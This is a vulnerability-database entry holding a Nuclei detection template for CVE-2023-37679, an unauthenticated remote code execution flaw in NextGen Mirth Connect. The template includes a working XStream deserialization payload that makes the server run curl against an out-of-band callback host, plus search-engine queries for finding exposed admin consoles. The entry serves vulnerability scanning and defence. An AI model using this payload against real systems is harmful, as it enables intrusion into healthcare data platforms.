NextGen Mirth Connect - Remote Code Execution

2023-10-2516:30:54

ProjectDiscovery

github.com

cve2023 nextgen healthcare rce unauthenticated healthcare widespread

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.7

Confidence

High

EPSS

0.974

Percentile

99.9%

JSON

Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability

id: CVE-2023-37679

info:
  name: NextGen Mirth Connect - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability
  reference:
    - https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37679
    - http://mirth.com
    - http://nextgen.com
    - http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-37679
    cwe-id: CWE-77
    epss-score: 0.07052
    epss-percentile: 0.9396
    cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: nextgen
    product: mirth_connect
    shodan-query:
      - title:"mirth connect administrator"
      - http.title:"mirth connect administrator"
    fofa-query: title="mirth connect administrator"
    google-query: intitle:"mirth connect administrator"
  tags: packetstorm,cve2023,cve,nextgen,rce

http:
  - raw:
      - |
        GET /api/server/version HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: OpenAPI
      - |
        POST /api/users HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: OpenAPI
        Content-Type: application/xml

        <sorted-set>
            <string>foo</string>
            <dynamic-proxy>
                <interface>java.lang.Comparable</interface>
                <handler class="java.beans.EventHandler">
                    <target class="java.lang.ProcessBuilder">
                        <command>
                            <string>curl</string>
                            <string>http://{{interactsh-url}}/</string>
                        </command>
                    </target>
                    <action>start</action>
                </handler>
            </dynamic-proxy>
        </sorted-set>

    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "<4.4.1")'
          - 'contains(interactsh_protocol, "dns")'
          - 'status_code_1 == 200 && status_code_2 == 500'
        condition: and

    extractors:
      - type: regex
        part: body_1
        name: version
        group: 1
        regex:
          - '(.*)'
        internal: true
# digest: 4a0a0047304502210090fa6ea3074ddefab156454bac75d98ecf2afccb77df469b6769e05ce26989a402201089a4c18eb1d115bde79688a15cbd51dacae795376dc2c19bde505d32158c91:922c64590222798bb761d5b6d8e72950